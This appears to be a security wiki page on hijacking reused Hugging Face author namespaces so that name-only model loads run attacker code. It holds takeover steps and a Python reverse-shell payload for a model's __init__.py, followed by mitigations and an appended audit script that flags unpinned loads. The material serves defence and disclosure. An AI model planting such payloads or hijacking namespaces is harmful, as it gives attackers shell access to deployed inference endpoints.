## AI/ML Model Registry Supply-Chain Attacks (Hugging Face Namespace Reuse)
A systemic weakness in how models are referenced and deployed can be abused across clouds and OSS: many pipelines resolve models by Author/ModelName (e.g., Hugging Face), without pinning to a specific commit or verifying integrity. If an author/org on Hugging Face is deleted, anyone can re-register the same author name and recreate the same ModelName, silently replacing what downstream systems pull when they resolve by name only. Transferred models can also be abused by breaking the old-path redirect if the old author is later deleted and re-registered by an attacker.
Key cases on the Hugging Face Hub:
- Ownership deletion: old Author/ModelName returns 404 until takeover by a new account that recreates the author and model.
- Ownership transfer: old Author/ModelName issues 307 to the new author; if the old author is later deleted and re-registered by an attacker, the legacy path resolves to attacker content.
1) Identify reusable namespaces (deleted authors, or transferred models whose old author was removed) that are still referenced by code, defaults, notebooks, docs, or cloud model catalogs.
2) Re-register the abandoned author on Hugging Face; recreate the same ModelName under that author.
3) Publish a malicious repo. Ensure the model loader executes code on import (e.g., __init__.py side effects, a custom modeling_*.py referenced by auto_map). Some loaders require trust_remote_code=True.
4) Rely on downstream systems that fetch by name only. When they deploy or call from_pretrained("Author/ModelName"), the attacker’s code executes inside the target runtime (e.g., a cloud inference endpoint container/VM) with that endpoint’s permissions.
Payload on load (example):

```python
# __init__.py or a module imported by the model loader
import os, socket, subprocess, threading

def _rs(host, port):
    s = socket.socket(); s.connect((host, port))
    for fd in (0, 1, 2):
        try:
            os.dup2(s.fileno(), fd)
        except Exception:
            pass
    subprocess.call(["/bin/sh", "-i"])  # demo purposes only

# Gate on an env var if desired
if os.environ.get("INFERENCE_ENDPOINT", "1") == "1":
    pass  # the rest of this block is missing from the source
```
- Google Vertex AI Model Garden: direct deploy of HF models; hijacked namespaces can yield RCE in the endpoint container when the platform loads attacker repo code.
- Microsoft Azure AI Foundry: Model Catalog includes HF models; hijacked namespaces can yield RCE in the deployed endpoint with that endpoint’s permissions.
- Treat Author/ModelName like any third-party dependency. Continuously scan codebases, defaults, docstrings, comments, model cards, and notebooks for HF identifiers and resolve their current ownership.
- Pin to a specific commit in loaders to prevent silent replacement:

```python
from transformers import AutoModel
m = AutoModel.from_pretrained("Author/ModelName", revision="<COMMIT_HASH>")
```

- Clone vetted models to trusted internal registries/artifact stores and reference those in production.
- Before deploying from cloud model catalogs, verify the current author and provenance of the referenced HF model. Be aware that catalog verifications can drift if upstream authors are deleted/re-registered.
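A small audit that covers the two mitigations above (scan code for HF identifiers, and require a commit pin): it walks Python source with `ast`, finds loader calls that reference an Author/ModelName, and reports those whose `revision=` is missing or is a branch/tag rather than a full commit hash. This is an added example, not code from the original page; the set of loader names in `HF_LOADERS` and the sample source are assumptions.

```python
# Added example (not the page's or any project's own code): flag Hugging Face model
# references in Python source that resolve by name only, i.e. without a commit-hash pin.
import ast
import re

# Loader calls that resolve an Author/ModelName against the hub (assumed set).
HF_LOADERS = {"from_pretrained", "snapshot_download", "hf_hub_download", "pipeline"}
HF_ID_RE = re.compile(r"^[A-Za-z0-9][\w.-]*/[\w.-]+$")  # Author/ModelName shape
COMMIT_RE = re.compile(r"^[0-9a-f]{40}$")               # only a full SHA is a real pin

def _kwarg(call, name):  # AST node passed as keyword `name`, or None
    return next((kw.value for kw in call.keywords if kw.arg == name), None)

def _str(node):  # string value of a constant node, else None
    return node.value if isinstance(node, ast.Constant) and isinstance(node.value, str) else None

def audit_source(src):
    """Return (line, repo_id, reason) for every hub reference not pinned to a commit hash."""
    findings = []
    for node in ast.walk(ast.parse(src)):
        if not isinstance(node, ast.Call):
            continue
        name = getattr(node.func, "attr", getattr(node.func, "id", None))
        if name not in HF_LOADERS:
            continue
        # repo id: first positional arg, or model=/repo_id= (pipeline() and hub helpers)
        cands = ([node.args[0]] if node.args else []) + [_kwarg(node, "model"), _kwarg(node, "repo_id")]
        repo_id = next((s for s in map(_str, cands) if s and HF_ID_RE.match(s)), None)
        if repo_id is None:
            continue
        rev = _str(_kwarg(node, "revision"))
        if rev is None:
            reason = "no revision= pin"
        elif not COMMIT_RE.match(rev):
            reason = f"revision={rev!r} is a branch or tag, not a commit hash"
        else:
            continue  # pinned: a re-registered namespace cannot silently replace this load
        trc = _kwarg(node, "trust_remote_code")
        if isinstance(trc, ast.Constant) and trc.value is True:
            reason += "; trust_remote_code=True lets the repo run code on load"
        findings.append((node.lineno, repo_id, reason))
    return findings

# Constructed sample source; "Author/ModelName" is the page's placeholder identifier.
SAMPLE = '''m = AutoModel.from_pretrained("Author/ModelName")
p = pipeline("text-generation", model="Author/ModelName", trust_remote_code=True)
s = snapshot_download("Author/ModelName", revision="main")
ok = AutoModel.from_pretrained("Author/ModelName", revision="0123456789abcdef0123456789abcdef01234567")
'''
```

Run it over each checked-in `.py` file (and over code cells extracted from notebooks) in CI; only the fourth sample line, pinned to a 40-hex commit, passes.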